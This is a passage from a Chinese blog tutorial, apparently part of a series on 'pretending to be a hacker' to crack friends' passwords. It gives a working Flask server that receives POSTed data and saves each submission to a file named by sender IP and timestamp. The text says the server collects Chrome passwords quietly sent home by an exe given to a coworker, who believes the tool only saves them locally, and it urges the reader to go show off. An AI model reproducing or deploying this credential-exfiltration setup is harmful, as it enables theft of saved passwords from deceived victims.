使用Python假装装黑客，批量破解朋友的网站密码(3)

下来，我们在本地写一个最简单的Flask程序，用户获取回传的参数，代码如下：

 1# -*- coding: utf-8 -*- 
 2# @Author  : 王翔 
 3# @JianShu : 清风Python 
 4# @Date    : 2019/5/18 22:53 
 5# Software : PyCharm 
 6# version：Python 3.6.8 
 7# @File    : ChromePassword.py 
 8 
 9from flask import Flask, request 
10import time 
11import json 
12 
13app = Flask(__name__) 
14 
15 
16@app.route('/index', methods=["GET", "POST"]) 
17def index(): 
18    if request.method == 'POST': 
19        _txtName = '%s_%s.txt' % (request.remote_addr, 
20                                  time.strftime('%Y%m%d%H%M%S', time.localtime())) 
21        with open(_txtName, 'w', encoding='utf-8') as f: 
22            f.writelines(json.loads(request.data)) 
23    return "小哥，里面玩儿啊" 
24 
25 
26if __name__ == '__main__': 
27    # 端口可自行设置 
28    app.run(host='0.0.0.0', port=9999) 

打完收工，就差同事去点击你发给他的exe了。他以为你的工具仅仅把Chrome密码生成txt保存，

其实，在他点击工具的同时，你电脑会获取他传输的数据，并存储在一个ip时间戳的文本中!

Flask回传.png

然后，拿去给他们炫耀吧!

（编辑：ASP站长网）